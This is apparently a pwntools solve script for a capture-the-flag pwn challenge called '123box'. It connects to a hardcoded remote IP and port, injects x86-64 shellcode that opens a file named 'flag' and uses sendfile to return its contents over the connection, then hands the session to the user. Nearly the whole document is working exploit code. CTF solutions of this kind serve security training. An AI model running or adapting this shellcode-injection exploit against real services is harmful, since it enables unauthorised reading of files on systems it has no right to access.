123box
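"""Solve script for the "123box" pwn challenge.

Flow: wait for the service's ``"> "`` prompt, send a short piece of
x86-64 shellcode, answer the follow-up prompt with an empty line, then
hand the connection to the user.  The shellcode does
``open("flag") -> sendfile(stdout, fd) -> exit``, so the file contents
come back over the same connection.
"""
from pwn import *

# arch/os must be configured before asm() so the assembler emits x86-64.
context(log_level="debug", arch="amd64", os="linux")

# Choose exactly one transport.  The original spawned ./pwn and then
# immediately rebound `io` to the remote socket, leaving an orphaned local
# process behind; select explicitly instead so only one handle is opened.
LOCAL = False
if LOCAL:
    io = process("./pwn")
else:
    io = remote("39.97.50.51", 13966)

# Consume the banner up to (and including) the prompt.
io.recvuntil(b"> ")

# Shellcode, same logic as before in a different layout.  Comment
# delimiters are repaired here: the `*` characters had been lost, leaving
# unbalanced `/ ... /` that the assembler rejects as division.  Comments
# are stripped by asm(), so the emitted bytes are unchanged.
shellcode = """
    /* push the NUL-terminated string "flag" onto the stack:
       0x67616c66 is "flag" little-endian; `push rax` writes 8 bytes,
       so the zero upper half of rax supplies the terminator */
    mov rax, 0x67616c66
    push rax
    mov rdi, rsp        /* filename pointer */
    xor rsi, rsi        /* O_RDONLY = 0 */
    mov rax, 2          /* sys_open */
    syscall

    mov rdi, 1          /* out_fd = stdout */
    mov rsi, rax        /* in_fd = fd returned by open */
    xor rdx, rdx        /* offset = NULL */
    mov r10, 256        /* count = 256 bytes */
    mov rax, 40         /* sys_sendfile */
    syscall

    mov rax, 60         /* sys_exit */
    xor rdi, rdi        /* status = 0 */
    syscall
"""
payload = asm(shellcode)
io.send(payload)

# The service prompts once more after receiving the code; reply with an
# empty line so it proceeds.
io.sendlineafter(b"> ", b"")
io.interactive()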
